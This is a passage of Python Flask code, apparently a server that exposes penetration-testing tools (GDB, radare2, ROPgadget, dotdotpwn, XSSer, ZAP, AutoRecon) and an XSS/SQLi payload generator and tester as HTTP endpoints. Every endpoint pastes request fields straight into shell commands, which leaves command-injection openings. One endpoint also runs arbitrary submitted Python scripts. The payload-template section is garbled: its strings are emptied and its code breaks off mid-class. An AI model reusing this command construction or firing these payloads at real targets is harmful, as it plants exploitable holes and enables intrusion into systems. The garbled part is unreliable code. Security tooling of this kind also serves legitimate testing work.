ANALYSIS & REVERSE ENGINEERING TOOLS # ============================================================================ @app.route("/api/tools/gdb", methods=["POST"]) def gdb(): """Execute GDB for binary analysis and debugging with enhanced logging""" try: params = request.json binary = params.get("binary", "") commands = params.get("commands", "") script_file = params.get("script_file", "") additional_args = params.get("additional_args", "") if not binary: logger.warning("πŸ”§ GDB called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 command = f"gdb {binary}" if script_file: command += f" -x {script_file}" if commands: temp_script = "/tmp/gdb_commands.txt" with open(temp_script, "w") as f: f.write(commands) command += f" -x {temp_script}" if additional_args: command += f" {additional_args}" command += " -batch" logger.info(f"πŸ”§ Starting GDB analysis: {binary}") result = execute_command(command) if commands and os.path.exists("/tmp/gdb_commands.txt"): try: os.remove("/tmp/gdb_commands.txt") except: pass logger.info(f"πŸ“Š GDB analysis completed for {binary}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in gdb endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/radare2", methods=["POST"]) def radare2(): """Execute Radare2 for binary analysis and reverse engineering with enhanced logging""" try: params = request.json binary = params.get("binary", "") commands = params.get("commands", "") additional_args = params.get("additional_args", "") if not binary: logger.warning("πŸ”§ Radare2 called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 if commands: temp_script = "/tmp/r2_commands.txt" with open(temp_script, "w") as f: f.write(commands) command = f"r2 -i {temp_script} -q {binary}" else: command = f"r2 -q {binary}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ”§ Starting Radare2 analysis: {binary}") result = execute_command(command) if commands and os.path.exists("/tmp/r2_commands.txt"): try: os.remove("/tmp/r2_commands.txt") except: pass logger.info(f"πŸ“Š Radare2 analysis completed for {binary}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in radare2 endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/binwalk", methods=["POST"]) def binwalk(): """Execute Binwalk for firmware and file analysis with enhanced logging""" try: params = request.json file_path = params.get("file_path", "") extract = params.get("extract", False) additional_args = params.get("additional_args", "") if not file_path: logger.warning("πŸ”§ Binwalk called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 command = f"binwalk" if extract: command += " -e" if additional_args: command += f" {additional_args}" command += f" {file_path}" logger.info(f"πŸ”§ Starting Binwalk analysis: {file_path}") result = execute_command(command) logger.info(f"πŸ“Š Binwalk analysis completed for {file_path}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in binwalk endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/ropgadget", methods=["POST"]) def ropgadget(): """Search for ROP gadgets in a binary using ROPgadget with enhanced logging""" try: params = request.json binary = params.get("binary", "") gadget_type = params.get("gadget_type", "") additional_args = params.get("additional_args", "") if not binary: logger.warning("πŸ”§ ROPgadget called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 command = f"ROPgadget --binary {binary}" if gadget_type: command += f" --only '{gadget_type}'" if additional_args: command += f" {additional_args}" logger.info(f"πŸ”§ Starting ROPgadget search: {binary}") result = execute_command(command) logger.info(f"πŸ“Š ROPgadget search completed for {binary}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in ropgadget endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/checksec", methods=["POST"]) def checksec(): """Check security features of a binary with enhanced logging""" try: params = request.json binary = params.get("binary", "") if not binary: logger.warning("πŸ”§ Checksec called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 command = f"checksec --file={binary}" logger.info(f"πŸ”§ Starting Checksec analysis: {binary}") result = execute_command(command) logger.info(f"πŸ“Š Checksec analysis completed for {binary}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in checksec endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/xxd", methods=["POST"]) def xxd(): """Create a hex dump of a file using xxd with enhanced logging""" try: params = request.json file_path = params.get("file_path", "") offset = params.get("offset", "0") length = params.get("length", "") additional_args = params.get("additional_args", "") if not file_path: logger.warning("πŸ”§ XXD called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 command = f"xxd -s {offset}" if length: command += f" -l {length}" if additional_args: command += f" {additional_args}" command += f" {file_path}" logger.info(f"πŸ”§ Starting XXD hex dump: {file_path}") result = execute_command(command) logger.info(f"πŸ“Š XXD hex dump completed for {file_path}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in xxd endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/strings", methods=["POST"]) def strings(): """Extract strings from a binary file with enhanced logging""" try: params = request.json file_path = params.get("file_path", "") min_len = params.get("min_len", 4) additional_args = params.get("additional_args", "") if not file_path: logger.warning("πŸ”§ Strings called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 command = f"strings -n {min_len}" if additional_args: command += f" {additional_args}" command += f" {file_path}" logger.info(f"πŸ”§ Starting Strings extraction: {file_path}") result = execute_command(command) logger.info(f"πŸ“Š Strings extraction completed for {file_path}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in strings endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/objdump", methods=["POST"]) def objdump(): """Analyze a binary using objdump with enhanced logging""" try: params = request.json binary = params.get("binary", "") disassemble = params.get("disassemble", True) additional_args = params.get("additional_args", "") if not binary: logger.warning("πŸ”§ Objdump called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 command = f"objdump" if disassemble: command += " -d" else: command += " -x" if additional_args: command += f" {additional_args}" command += f" {binary}" logger.info(f"πŸ”§ Starting Objdump analysis: {binary}") result = execute_command(command) logger.info(f"πŸ“Š Objdump analysis completed for {binary}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in objdump endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 # ============================================================================ # ADDITIONAL WEB SECURITY TOOLS # ============================================================================ @app.route("/api/tools/feroxbuster", methods=["POST"]) def feroxbuster(): """Execute Feroxbuster for recursive content discovery with enhanced logging""" try: params = request.json url = params.get("url", "") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") threads = params.get("threads", 10) additional_args = params.get("additional_args", "") if not url: logger.warning("🌐 Feroxbuster called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"feroxbuster -u {url} -w {wordlist} -t {threads}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Feroxbuster scan: {url}") result = execute_command(command) logger.info(f"πŸ“Š Feroxbuster scan completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in feroxbuster endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/dotdotpwn", methods=["POST"]) def dotdotpwn(): """Execute DotDotPwn for directory traversal testing with enhanced logging""" try: params = request.json target = params.get("target", "") module = params.get("module", "http") additional_args = params.get("additional_args", "") if not target: logger.warning("🎯 DotDotPwn called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"dotdotpwn -m {module} -h {target}" if additional_args: command += f" {additional_args}" command += " -b" logger.info(f"πŸ” Starting DotDotPwn scan: {target}") result = execute_command(command) logger.info(f"πŸ“Š DotDotPwn scan completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in dotdotpwn endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/xsser", methods=["POST"]) def xsser(): """Execute XSSer for XSS vulnerability testing with enhanced logging""" try: params = request.json url = params.get("url", "") params_str = params.get("params", "") additional_args = params.get("additional_args", "") if not url: logger.warning("🌐 XSSer called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"xsser --url '{url}'" if params_str: command += f" --param='{params_str}'" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting XSSer scan: {url}") result = execute_command(command) logger.info(f"πŸ“Š XSSer scan completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in xsser endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/wfuzz", methods=["POST"]) def wfuzz(): """Execute Wfuzz for web application fuzzing with enhanced logging""" try: params = request.json url = params.get("url", "") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") if not url: logger.warning("🌐 Wfuzz called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"wfuzz -w {wordlist} '{url}'" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Wfuzz scan: {url}") result = execute_command(command) logger.info(f"πŸ“Š Wfuzz scan completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in wfuzz endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 # ============================================================================ # ADVANCED WEB SECURITY TOOLS CONTINUED # ============================================================================ @app.route("/api/tools/burpsuite", methods=["POST"]) def burpsuite(): """Execute Burp Suite with enhanced logging""" try: params = request.json project_file = params.get("project_file", "") config_file = params.get("config_file", "") target = params.get("target", "") additional_args = params.get("additional_args", "") headless = params.get("headless", False) scan_type = params.get("scan_type", "") scan_config = params.get("scan_config", "") output_file = params.get("output_file", "") command = "burpsuite" if headless: command += " --headless" if project_file: command += f" --project-file=\"{project_file}\"" if config_file: command += f" --config-file=\"{config_file}\"" if target: command += f" --target=\"{target}\"" if headless and scan_type: command += f" --{scan_type}" if scan_config: command += f" --scan-config=\"{scan_config}\"" if output_file: command += f" --output-file=\"{output_file}\"" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Burp Suite scan") result = execute_command(command) logger.info(f"πŸ“Š Burp Suite scan completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in burpsuite endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/zap", methods=["POST"]) def zap(): """Execute OWASP ZAP with enhanced logging""" try: params = request.json target = params.get("target", "") scan_type = params.get("scan_type", "baseline") api_key = params.get("api_key", "") daemon = params.get("daemon", False) port = params.get("port", "8090") host = params.get("host", "0.0.0.0") format_type = params.get("format", "xml") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") if not target and scan_type != "daemon": logger.warning("🎯 ZAP called without target parameter") return jsonify({ "error": "Target parameter is required for scans" }), 400 if daemon: command = f"zaproxy -daemon -host {host} -port {port}" if api_key: command += f" -config api.key={api_key}" else: command = f"zaproxy -cmd -quickurl {target}" if format_type: command += f" -quickout {format_type}" if output_file: command += f" -quickprogress -dir \"{output_file}\"" if api_key: command += f" -config api.key={api_key}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting ZAP scan: {target}") result = execute_command(command) logger.info(f"πŸ“Š ZAP scan completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in zap endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/arjun", methods=["POST"]) def arjun(): """Execute Arjun for parameter discovery with enhanced logging""" try: params = request.json url = params.get("url", "") method = params.get("method", "GET") data = params.get("data", "") headers = params.get("headers", "") timeout = params.get("timeout", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") if not url: logger.warning("🎯 Arjun called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"arjun -u \"{url}\" -m {method}" if data and method.upper() == "POST": command += f" -d \"{data}\"" if headers: command += f" -H \"{headers}\"" if timeout: command += f" -t {timeout}" if output_file: command += f" -o \"{output_file}\"" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Arjun parameter discovery: {url}") result = execute_command(command) logger.info(f"πŸ“Š Arjun completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in arjun endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/wafw00f", methods=["POST"]) def wafw00f(): """Execute wafw00f to identify and fingerprint WAF products with enhanced logging""" try: params = request.json target = params.get("target", "") additional_args = params.get("additional_args", "") if not target: logger.warning("πŸ›‘οΈ Wafw00f called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"wafw00f {target}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ›‘οΈ Starting Wafw00f WAF detection: {target}") result = execute_command(command) logger.info(f"πŸ“Š Wafw00f completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in wafw00f endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/fierce", methods=["POST"]) def fierce(): """Execute fierce for DNS reconnaissance with enhanced logging""" try: params = request.json domain = params.get("domain", "") dns_server = params.get("dns_server", "") additional_args = params.get("additional_args", "") if not domain: logger.warning("🌐 Fierce called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 command = f"fierce --domain {domain}" if dns_server: command += f" --dns-servers {dns_server}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Fierce DNS recon: {domain}") result = execute_command(command) logger.info(f"πŸ“Š Fierce completed for {domain}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in fierce endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/dnsenum", methods=["POST"]) def dnsenum(): """Execute dnsenum for DNS enumeration with enhanced logging""" try: params = request.json domain = params.get("domain", "") dns_server = params.get("dns_server", "") wordlist = params.get("wordlist", "") additional_args = params.get("additional_args", "") if not domain: logger.warning("🌐 DNSenum called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 command = f"dnsenum {domain}" if dns_server: command += f" --dnsserver {dns_server}" if wordlist: command += f" --file {wordlist}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting DNSenum: {domain}") result = execute_command(command) logger.info(f"πŸ“Š DNSenum completed for {domain}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in dnsenum endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/autorecon", methods=["POST"]) def autorecon(): """Execute AutoRecon for comprehensive target enumeration with full parameter support.""" try: params = request.json # Basic parameters target = params.get("target", "") target_file = params.get("target_file", "") ports = params.get("ports", "") output_dir = params.get("output_dir", "") # Scan control parameters max_scans = params.get("max_scans", "") max_port_scans = params.get("max_port_scans", "") heartbeat = params.get("heartbeat", "") timeout = params.get("timeout", "") target_timeout = params.get("target_timeout", "") # Configuration parameters config_file = params.get("config_file", "") global_file = params.get("global_file", "") plugins_dir = params.get("plugins_dir", "") add_plugins_dir = params.get("add_plugins_dir", "") # Plugin selection parameters tags = params.get("tags", "") exclude_tags = params.get("exclude_tags", "") port_scans = params.get("port_scans", "") service_scans = params.get("service_scans", "") reports = params.get("reports", "") # Directory structure options single_target = params.get("single_target", False) only_scans_dir = params.get("only_scans_dir", False) no_port_dirs = params.get("no_port_dirs", False) # Nmap options nmap = params.get("nmap", "") nmap_append = params.get("nmap_append", "") # Misc options proxychains = params.get("proxychains", False) disable_sanity_checks = params.get("disable_sanity_checks", False) disable_keyboard_control = params.get("disable_keyboard_control", False) force_services = params.get("force_services", "") accessible = params.get("accessible", False) verbose = params.get("verbose", 0) # 0 for none, 1+ for increasing verbosity # Plugin-specific options curl_path = params.get("curl_path", "") dirbuster_tool = params.get("dirbuster_tool", "") dirbuster_wordlist = params.get("dirbuster_wordlist", "") dirbuster_threads = params.get("dirbuster_threads", "") dirbuster_ext = params.get("dirbuster_ext", "") onesixtyone_community_strings = params.get("onesixtyone_community_strings", "") # Global plugin options global_username_wordlist = params.get("global_username_wordlist", "") global_password_wordlist = params.get("global_password_wordlist", "") global_domain = params.get("global_domain", "") # Additional arguments additional_args = params.get("additional_args", "") if not target and not target_file: logger.warning("🎯 AutoRecon called without target or target_file parameter") return jsonify({ "error": "Either target or target_file parameter is required" }), 400 # Build the command command = "autorecon" # Add target or target file if target: command += f" {target}" if target_file: command += f" -t {target_file}" # Add basic scan options if ports: command += f" -p {ports}" if output_dir: command += f" -o {output_dir}" # Add scan control parameters if max_scans: command += f" -m {max_scans}" if max_port_scans: command += f" -mp {max_port_scans}" if heartbeat: command += f" --heartbeat {heartbeat}" if timeout: command += f" --timeout {timeout}" if target_timeout: command += f" --target-timeout {target_timeout}" # Add configuration parameters if config_file: command += f" -c {config_file}" if global_file: command += f" -g {global_file}" if plugins_dir: command += f" --plugins-dir {plugins_dir}" if add_plugins_dir: command += f" --add-plugins-dir {add_plugins_dir}" # Add plugin selection parameters if tags: command += f" --tags {tags}" if exclude_tags: command += f" --exclude-tags {exclude_tags}" if port_scans: command += f" --port-scans {port_scans}" if service_scans: command += f" --service-scans {service_scans}" if reports: command += f" --reports {reports}" # Add directory structure options if single_target: command += " --single-target" if only_scans_dir: command += " --only-scans-dir" if no_port_dirs: command += " --no-port-dirs" # Add nmap options if nmap: command += f" --nmap \"{nmap}\"" if nmap_append: command += f" --nmap-append \"{nmap_append}\"" # Add misc options if proxychains: command += " --proxychains" if disable_sanity_checks: command += " --disable-sanity-checks" if disable_keyboard_control: command += " --disable-keyboard-control" if force_services: command += f" --force-services {force_services}" if accessible: command += " --accessible" # Add verbosity for _ in range(verbose): command += " -v" # Add plugin-specific options if curl_path: command += f" --curl.path {curl_path}" if dirbuster_tool: command += f" --dirbuster.tool {dirbuster_tool}" if dirbuster_wordlist: command += f" --dirbuster.wordlist {dirbuster_wordlist}" if dirbuster_threads: command += f" --dirbuster.threads {dirbuster_threads}" if dirbuster_ext: command += f" --dirbuster.ext {dirbuster_ext}" if onesixtyone_community_strings: command += f" --onesixtyone.community-strings {onesixtyone_community_strings}" # Add global plugin options if global_username_wordlist: command += f" --global.username-wordlist {global_username_wordlist}" if global_password_wordlist: command += f" --global.password-wordlist {global_password_wordlist}" if global_domain: command += f" --global.domain {global_domain}" # Add any additional arguments if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting AutoRecon comprehensive enumeration: {target}") result = execute_command(command) logger.info(f"πŸ“Š AutoRecon comprehensive enumeration completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in autorecon endpoint: {str(e)}") logger.error(traceback.format_exc()) return jsonify({ "error": f"Server error: {str(e)}" }), 500 # Python Environment Management Endpoints @app.route("/api/python/install", methods=["POST"]) def install_python_package(): """Install a Python package in a virtual environment""" try: params = request.json package = params.get("package", "") env_name = params.get("env_name", "default") if not package: return jsonify({"error": "Package name is required"}), 400 logger.info(f"πŸ“¦ Installing Python package: {package} in env {env_name}") success = env_manager.install_package(env_name, package) if success: return jsonify({ "success": True, "message": f"Package {package} installed successfully", "env_name": env_name }) else: return jsonify({ "success": False, "error": f"Failed to install package {package}" }), 500 except Exception as e: logger.error(f"πŸ’₯ Error installing Python package: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/python/execute", methods=["POST"]) def execute_python_script(): """Execute a Python script in a virtual environment""" try: params = request.json script = params.get("script", "") env_name = params.get("env_name", "default") filename = params.get("filename", f"script_{int(time.time())}.py") if not script: return jsonify({"error": "Script content is required"}), 400 # Create script file script_result = file_manager.create_file(filename, script) if not script_result["success"]: return jsonify(script_result), 500 # Get Python path for environment python_path = env_manager.get_python_path(env_name) script_path = script_result["path"] # Execute script command = f"{python_path} {script_path}" logger.info(f"🐍 Executing Python script in env {env_name}: {filename}") result = execute_command(command, use_cache=False) # Clean up script file file_manager.delete_file(filename) result["env_name"] = env_name result["script_filename"] = filename logger.info(f"πŸ“Š Python script execution completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error executing Python script: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 # ============================================================================ # AI-POWERED PAYLOAD GENERATION (v5.0 ENHANCEMENT) UNDER DEVELOPMENT # ============================================================================ class AIPayloadGenerator: """AI-powered payload generation system with contextual intelligence""" def __init__(self): self.payload_templates = { "xss": { "basic": ["", "javascript:alert('XSS')", "'>"], "advanced": [ "", "", "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//", "\">"] def _enhance_with_context(self, payloads: list, tech_context: str) -> list: """Enhance payloads with contextual information""" enhanced = [] for payload in payloads: # Basic payload enhanced.append({ "payload": payload, "context": "basic", "encoding": "none", "risk_level": self._assess_risk_level(payload) }) # URL encoded version url_encoded = payload.replace(" ", "%20").replace("<", "%3C").replace(">", "%3E") enhanced.append({ "payload": url_encoded, "context": "url_encoded", "encoding": "url", "risk_level": self._assess_risk_level(payload) }) return enhanced def _generate_test_cases(self, payloads: list, attack_type: str) -> list: """Generate test cases for the payloads""" test_cases = [] for i, payload_info in enumerate(payloads[:5]): # Limit to 5 test cases test_case = { "id": f"test_{i+1}", "payload": payload_info["payload"], "method": "GET" if len(payload_info["payload"]) < 100 else "POST", "expected_behavior": self._get_expected_behavior(attack_type), "risk_level": payload_info["risk_level"] } test_cases.append(test_case) return test_cases def _get_expected_behavior(self, attack_type: str) -> str: """Get expected behavior for attack type""" behaviors = { "xss": "JavaScript execution or popup alert", "sqli": "Database error or data extraction", "lfi": "File content disclosure", "cmd_injection": "Command execution on server", "ssti": "Template expression evaluation", "xxe": "XML external entity processing" } return behaviors.get(attack_type, "Unexpected application behavior") def _assess_risk_level(self, payload: str) -> str: """Assess risk level of payload""" high_risk_indicators = ["system", "exec", "eval", "cmd", "shell", "passwd", "etc"] medium_risk_indicators = ["script", "alert", "union", "select"] payload_lower = payload.lower() if any(indicator in payload_lower for indicator in high_risk_indicators): return "HIGH" elif any(indicator in payload_lower for indicator in medium_risk_indicators): return "MEDIUM" else: return "LOW" def _get_recommendations(self, attack_type: str) -> list: """Get testing recommendations""" recommendations = { "xss": [ "Test in different input fields and parameters", "Try both reflected and stored XSS scenarios", "Test with different browsers for compatibility" ], "sqli": [ "Test different SQL injection techniques", "Try both error-based and blind injection", "Test various database-specific payloads" ], "lfi": [ "Test various directory traversal depths", "Try different encoding techniques", "Test for log file inclusion" ], "cmd_injection": [ "Test different command separators", "Try both direct and blind injection", "Test with various payloads for different OS" ] } return recommendations.get(attack_type, ["Test thoroughly", "Monitor responses"]) # Global AI payload generator ai_payload_generator = AIPayloadGenerator() @app.route("/api/ai/generate_payload", methods=["POST"]) def ai_generate_payload(): """Generate AI-powered contextual payloads for security testing""" try: params = request.json target_info = { "attack_type": params.get("attack_type", "xss"), "complexity": params.get("complexity", "basic"), "technology": params.get("technology", ""), "url": params.get("url", "") } logger.info(f"πŸ€– Generating AI payloads for {target_info['attack_type']} attack") result = ai_payload_generator.generate_contextual_payload(target_info) logger.info(f"βœ… Generated {result['payload_count']} contextual payloads") return jsonify({ "success": True, "ai_payload_generation": result, "timestamp": datetime.now().isoformat() }) except Exception as e: logger.error(f"πŸ’₯ Error in AI payload generation: {str(e)}") return jsonify({ "success": False, "error": f"Server error: {str(e)}" }), 500 @app.route("/api/ai/test_payload", methods=["POST"]) def ai_test_payload(): """Test generated payload against target with AI analysis""" try: params = request.json payload = params.get("payload", "") target_url = params.get("target_url", "") method = params.get("method", "GET") if not payload or not target_url: return jsonify({ "success": False, "error": "Payload and target_url are required" }), 400 logger.info(f"πŸ§ͺ Testing AI-generated payload against {target_url}") # Create test command based on method and payload if method.upper() == "GET": encoded_payload = payload.replace(" ", "%20").replace("'", "%27") test_command = f"curl -s '{target_url}?test={encoded_payload}'" else: test_command = f"curl -s -X POST -d 'test={payload}' '{target_url}'" # Execute test result = execute_command(test_command, use_cache=False) # AI analysis of results analysis = { "payload_tested": payload, "target_url": target_url, "method": method, "response_size": len(result.get("stdout", "")), "success": result.get("success", False), "potential_vulnerability": payload.lower() in result.get("stdout", "").lower(), "recommendations": [ "Analyze response for payload reflection", "Check for error messages indicating vulnerability", "Monitor application behavior changes" ] } logger.info(f"πŸ” Payload test completed | Potential vuln: {analysis['potential_vulnerability']}") return jsonify({ "success": True, "test_result": result, "ai_analysis": analysis, "timestamp": datetime.now().isoformat() }) except Exception as e: logger.error(f"πŸ’₯ Error in AI payload testing: {str(e)}") return jsonify({ "success": False, "error": f"Server error: {str(e)}" }), 500 # ============================================================================ # ADVANCED API TESTING TOOLS (v5.0 ENHANCEMENT) # ============================================================================ @app.route("/api/tools/api_fuzzer", methods=["POST"]) def api_fuzzer(): """Advanced API endpoint fuzzing with intelligent parameter discovery""" try: params = request.json base_url = params.get("base_url", "") endpoints = params.get("endpoints", []) methods = params.get("methods", ["GET", "POST", "PUT", "DELETE"]) wordlist = params.get("wordlist", "/usr/share/wordlists/api/api-endpoints.txt") if not base_url: logger.warning("🌐 API Fuzzer called without base_url parameter") return jsonify({ "error": "Base URL parameter is required" }), 400 # Create comprehensive API fuzzing command if endpoints: # Test specific endpoints results = [] for endpoint in endpoints: for method in methods: test_url = f"{base_url.rstrip('/')}/{endpoint.lstrip('/')}" command = f"curl -s -X {method} -w '%{{http_code}}|%{{size_download}}' '{test_url}'" result = execute_command(command, use_cache=False) results.append({ "endpoint": endpoint, "method": method, "result": result }) logger.info(f"πŸ” API endpoint testing completed for {len(endpoints)} endpoints") return jsonify({ "success": True, "fuzzing_type": "endpoint_testing", "results": results }) else: # Discover endpoints using wordlist command = f"ffuf -u {base_url}/FUZZ -w {wordlist} -mc 200,201,202,204,301,302,307,401,403,405 -t 50" logger.info(f"πŸ” Starting API endpoint discovery: {base_url}") result = execute_command(command) logger.info(f"πŸ“Š API endpoint discovery completed") return jsonify({ "success": True, "fuzzing_type": "endpoint_discovery", "result": result }) except Exception as e: logger.error(f"πŸ’₯ Error in API fuzzer: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/graphql_scanner", methods=["POST"]) def graphql_scanner(): """Advanced GraphQL security scanning and introspection""" try: params = request.json endpoint = params.get("endpoint", "") introspection = params.get("introspection", True) query_depth = params.get("query_depth", 10) mutations = params.get("test_mutations", True) if not endpoint: logger.warning("🌐 GraphQL Scanner called without endpoint parameter") return jsonify({ "error": "GraphQL endpoint parameter is required" }), 400 logger.info(f"πŸ” Starting GraphQL security scan: {endpoint}") results = { "endpoint": endpoint, "tests_performed": [], "vulnerabilities": [], "recommendations": [] } # Test 1: Introspection query if introspection: introspection_query = ''' { __schema { types { name fields { name type { name } } } } } ''' clean_query = introspection_query.replace('\n', ' ').replace(' ', ' ').strip() command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{{\"query\":\"{clean_query}\"}}' '{endpoint}'" result = execute_command(command, use_cache=False) results["tests_performed"].append("introspection_query") if "data" in result.get("stdout", ""): results["vulnerabilities"].append({ "type": "introspection_enabled", "severity": "MEDIUM", "description": "GraphQL introspection is enabled" }) # Test 2: Query depth analysis deep_query = "{ " * query_depth + "field" + " }" * query_depth command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{{\"query\":\"{deep_query}\"}}' {endpoint}" depth_result = execute_command(command, use_cache=False) results["tests_performed"].append("query_depth_analysis") if "error" not in depth_result.get("stdout", "").lower(): results["vulnerabilities"].append({ "type": "no_query_depth_limit", "severity": "HIGH", "description": f"No query depth limiting detected (tested depth: {query_depth})" }) # Test 3: Batch query testing batch_query = '[' + ','.join(['{\"query\":\"{field}\"}' for _ in range(10)]) + ']' command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{batch_query}' {endpoint}" batch_result = execute_command(command, use_cache=False) results["tests_performed"].append("batch_query_testing") if "data" in batch_result.get("stdout", "") and batch_result.get("success"): results["vulnerabilities"].append({ "type": "batch_queries_allowed", "severity": "MEDIUM", "description": "Batch queries are allowed without rate limiting" }) # Generate recommendations if results["vulnerabilities"]: results["recommendations"] = [ "Disable introspection in production", "Implement query depth limiting", "Add rate limiting for batch queries", "Implement query complexity analysis", "Add authentication for sensitive operations" ] logger.info(f"πŸ“Š GraphQL scan completed | Vulnerabilities found: {len(results['vulnerabilities'])}") return jsonify({ "success": True, "graphql_scan_results": results }) except Exception as e: logger.error(f"πŸ’₯ Error in GraphQL scanner: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/jwt_analyzer", methods=["POST"]) def jwt_analyzer(): """Advanced JWT token analysis and vulnerability testing""" try: params = request.json jwt_token = params.get("jwt_token", "") target_url = params.get("target_url", "") if not jwt_token: logger.warning("πŸ” JWT Analyzer called without jwt_token parameter") return jsonify({ "error": "JWT token parameter is required" }), 400 logger.info(f"πŸ” Starting JWT security analysis") results = { "token": jwt_token[:50] + "..." if len(jwt_token) > 50 else jwt_token, "vulnerabilities": [], "token_info": {}, "attack_vectors": [] } # Decode JWT header and payload (basic analysis) try: parts = jwt_token.split('.') if len(parts) >= 2: # Decode header import base64 import json # Add padding if needed header_b64 = parts[0] + '=' * (4 - len(parts[0]) % 4) payload_b64 = parts[1] + '=' * (4 - len(parts[1]) % 4) try: header = json.loads(base64.b64decode(header_b64)) payload = json.loads(base64.b64decode(payload_b64)) results["token_info"] = { "header": header, "payload": payload, "algorithm": header.get("alg", "unknown") } # Check for vulnerabilities algorithm = header.get("alg", "").lower() if algorithm == "none": results["vulnerabilities"].append({ "type": "none_algorithm", "severity": "CRITICAL", "description": "JWT uses 'none' algorithm - no signature verification" }) if algorithm in ["hs256", "hs384", "hs512"]: results["attack_vectors"].append("hmac_key_confusion") results["vulnerabilities"].append({ "type": "hmac_algorithm", "severity": "MEDIUM", "description": "HMAC algorithm detected - vulnerable to key confusion attacks" }) # Check token expiration exp = payload.get("exp") if not exp: results["vulnerabilities"].append({ "type": "no_expiration", "severity": "HIGH", "description": "JWT token has no expiration time" }) except Exception as decode_error: results["vulnerabilities"].append({ "type": 